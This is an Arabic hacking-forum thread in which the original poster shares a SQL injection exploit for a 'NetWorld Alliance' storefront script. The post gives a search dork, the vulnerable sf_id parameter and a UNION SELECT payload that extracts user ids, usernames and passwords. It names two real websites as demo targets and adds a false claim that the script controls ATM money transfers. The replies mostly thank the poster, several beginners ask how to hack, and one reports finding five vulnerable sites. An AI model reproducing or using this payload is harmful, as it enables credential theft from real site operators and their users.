:: vBspiders Professional Network :: - ثالث ثغرة في اليوم لك [you]

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- - ثالث ثغرة في اليوم لك [you] (http://www.vbspiders.com/vb/t31349.html)

ثالث ثغرة في اليوم لك [you]

السلام عليكم ورحمة الله وبركاته
الحمد لله اليوم اكتشفت ثلاث ثغرات
هذه هي الثالثة لعيونك يا [you]

كود PHP:

   # Exploit Title:   NetWorld Alliance SQL InJection
# Date: 27/06/2010
# Author: dev!l ghost
# Email: aws(at)live(dot)it
# Site : www.vbspiders.com
# Script url: http://www.networldalliance.com/2010-digital-signage-future-trends-report
# Price: US$797.00 
# Version: N/A
# Tested on: Windows
# CVE : ()
  
:::::::::::::::::::::::::
  
  
=================Exploit=================
Descript: This Script Is For ATM Machine And How To use it and give and 
get and transfer money from it 
it is private script

---DorK:("© 2010 NetWorld Alliance")---

You will get a lot of sites  enter any site
and then Put this (storefronts.php?sf_id=any number)
after id put any number and start inject
 


----exploit----   

{{exploit}}
http://www.xxxxxx.com/storefronts.php?sf_id=(39)  --SQLI--
after the number put this 
(+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--)
DeMo1
https://www.kioskmarketplace.com/storefronts.php?sf_id=-39+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--

DeMo2
http://www.digitalsignagetoday.com/storefronts.php?sf_id=-243+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--
---------greatz----------
Greatz to all my frinds and the all muslims 
and Golden Ice and mr.ip
and the all who know me
And VBspiders 

thank you

وشكرا لكم اه نسيت ورابط الثغرة
Dev!l Ghost

يالله السلام عليكم مع ثغرة جديدة
حياك الله [you]

لوول والله ابداع ماشاء الله عليك ياخي

بارك الله فيك واصل ابداعك

السلام عليكم ورحمة الله
ماشاء الله عليك يا غالي
والله أفرحتني ..
لم أكن أتوقع أن شخصا سيهديني يوما شيئا في هذا المنتدى
:) :)

ماشاء الله عليك ياخي

اقتباس:

المشاركة الأصلية كتبت بواسطة mr.vih (المشاركة 159449)

http://www10.0zz0.com/2010/06/28/02/607171819.jpg

وانا كذلك لم اتوقع ان يهديني شخص شيء في المنتدى smilies4smilies12

اخي هذا خطا يحصل احيانا لم شخص يرفع موضوع يكون باسماء الاعضاء

اي كل عضو يرى ان الموضوع باسمه

هكذا حصل معي في البداية :sossa:

كفو يعطيك الف عافيه اخوي وتسلم على الاهداء

مشكور يا بطل على العمل المميز

مشكورين على المرور
لولاكم ما كان الموضوع احلى

شكرا اخي والله انا من زمان وانا بدي الثغر بس لاي متصفح
شكراااا افضل هدية

مشكووووور يا بطل واصل و لاتفاصل

امواح يا حبيب قلبي <~

مشكور على الثغرات

وشكرا على الاهداء هههههههههههههههههه

كفو يعطيك الف عافيه اخوي وتسلم على الاهداء

غريبة انى دخلت الموضوع بس عنوان الموضوع كنش ده يا ان المهم قولى استغلها ازاى دى

اخي كيف اخترقه انا لا اعرف

مشكووووووور ويعطيك العافيه يالغلا

تسلم والله ..

انت اول واحد يهديني ..

مشكووووووووور ..

شكرا أخي واصل تميزك (:

بارك الله فيك اخي وشكرا لك على الاهداء الرائع

والله ابداع ماشاء الله عليك ياخي م اتوقع ان يهديني شخص شيء في المنتدى

thnx ya man but do you do that for me ???

شكراااااا لك . موفــــــــــــــــــــــــــــــــــــــــــق

شكرأ حبيبي اوس ما قصرت

بارك الله فيك

chokran asdi9a2i ana mobtade2 fi hacker website and i wanna someone teach mee

شكرا جزييييلن لك

يسلمو ايديك أخي الكريم وجزيل الشكر مع اني مسجل جديد بالمنتدى حياك الله تسلم والله اني خجلت

تسلم يا بطل ع الثغرة
وبالنسبة للاسماء اعتقد ده هاك (U)

مشكورررررررررررررر ياغالي والي الامام

بارك الله فيك اخي الكريم وياريت لو تشرح لنا لأني مبتدئ وكسول

تحياتي اليك

يعطيك الف الف عافيه ياغالي mobdeen مشكووور يابطل

رح تخجلوووني من لهدايا

مبروك الأكتشاف

يعطيك الف الف عافيه ياغالي mobdeen مشكووور يابطل
والله ثغرة 100% و لقيت 5 مواقع مصابة بس باقي الإستغلال :icon555::icon555::icon555::icon555::icon555:

مشكووووووووووور حبي تسلم ايدك وردةsmilies15

مشكوووور ولكن انا مبتدئ لا اعرف كيفية استخدام التغرات وما مصلحتها هههههه وشكووووووووووور اخي على المجهود

مشكور على الثغرات

وشكرا على الاهداء هههههههههههههههههه